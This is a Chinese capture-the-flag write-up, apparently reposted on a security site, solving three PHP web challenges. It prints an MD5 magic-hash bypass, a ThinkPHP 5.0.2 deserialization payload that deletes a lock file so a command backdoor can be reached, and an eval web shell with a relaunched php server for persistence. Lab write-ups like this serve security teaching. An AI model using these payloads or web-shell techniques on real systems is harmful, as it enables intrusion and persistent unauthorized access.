CTF月饼杯 writeup

admin 2021年10月9日17:37:00CTF月饼杯 writeup已关闭评论126 views字数 2448阅读8分9秒阅读模式

web签到

<?php
//Author:H3h3QAQ
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET["YBB"])) {
    if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) {
        echo "小伙子不错嘛!!flag给你了:" . $flag;
    } else {
        echo "偶吼,带黑阔被窝抓到了!!!!";
    }
}
<?php
for($i=0;$i<10000000000000;$i++){
    $str='0e'.(string)$i;
    if(hash("md5",$str)==$str){
        echo $str;
        break;
    }
}
0e215962017

eztp

<?php
namespace appindexcontroller;
class Index
{   
    public function index($run=[])
    {
        highlight_file(__FILE__);
        echo '<h1>Welcome to CTFSHOW</h1></br>';
        echo 'Powered by PHPthink5.0.2</br>';
        echo dirname(__FILE__);

    if (!empty($run[2])){
            echo 'ZmxhZyBpcyBub3QgaGVyZSBidXQgaXQgaXMgaW4gZmxhZy50eHQ=';
        }
    if (!empty($run[1])){
            unserialize($run[1]);
        }
    }
    // hint:/index/index/backdoor
    public function backdoor(){
        if (!file_exists(dirname(__FILE__).'/../../'."install.lock")){
        echo "Try to post CMD arguments".'<br/>';
            $data = input('post.');
            if (!preg_match('/flag/i',$data['cmd'])){
                $cmd = escapeshellarg($data['cmd']);
        $cmd='cat '.$cmd;
        echo $cmd;
                system($cmd);
            }else{
                echo "No No No";
            }

        }else{
        echo dirname(__FILE__).'/../../'."install.lock has not been deleted";
    }
    }
}

访问:?s=/index/index/backdoor

/var/www/html/application/index/controller/../../install.lock has not been deleted

任意文件删除poc

<?php
namespace thinkprocesspipes;
class Windows{
    private $files = [];
    public function __construct(){
        $this->files=['/var/www/html/application/install.lock'];
    }
}
echo urlencode(serialize(new Windows()));

payload

?run[]=1&run[]=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fvar%2Fwww%2Fhtml%2Fapplication%2Finstall.lock%22%3B%7D%7D
?s=/index/index/backdoor
cmd=/fl%81ag

不要离开我

<?php

// 题目说明:
// 想办法维持权限,确定无误后提交check,通过check后,才会生成flag,此前flag不存在

error_reporting(0);
highlight_file(__FILE__);

$a=$_GET['action'];

switch($a){
    case 'cmd':
        eval($_POST['cmd']);
        break;
    case 'check':
        file_get_contents("http://checker/api/check");
        break;
    default:
        die('params not validate');
}
  • 当前目录下(/var/www/html)无写权限
  • check后会关闭nginx和php-fpm,并清空web目录(/var/www/html

方法一

get/action=cmd

post:cmd=file_put_contents("/tmp/index.php","<?php eval($_POST[1]);?>");system
("sleep 5 %26%26 php -S 0.0.0.0:80 -t /tmp/");

get:/action=check

方法二

get:/action=cmd

post:cmd=system('sleep 5 %26%26 php -S 0.0.0.0:80 -t /');

get:/action=check

get:/flag_ssk.txt

方法三

cmd=system('curl http://checker/api/check;cp /f* /tmp/flag;php -S 0.0.0.0:80 -t /tmp/');

results matching ""

    No results matching ""

    相关推荐: 记一道智能合约CTF思路

    点击蓝字  关注我们题目源码ropsten测试网络地址:https://ropsten.etherscan.io/address/0x63266aaf6bdf3076a02d49eb73ae847cfd0a945c#code思路解析此处有俩…

    • 左青龙
    • 微信扫一扫
    • weinxin
    • 右白虎
    • 微信扫一扫
    • weinxin
    admin
    • 本文由 发表于 2021年10月9日17:37:00
    • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                     CTF月饼杯 writeuphttp://cn-sec.com/archives/574987.html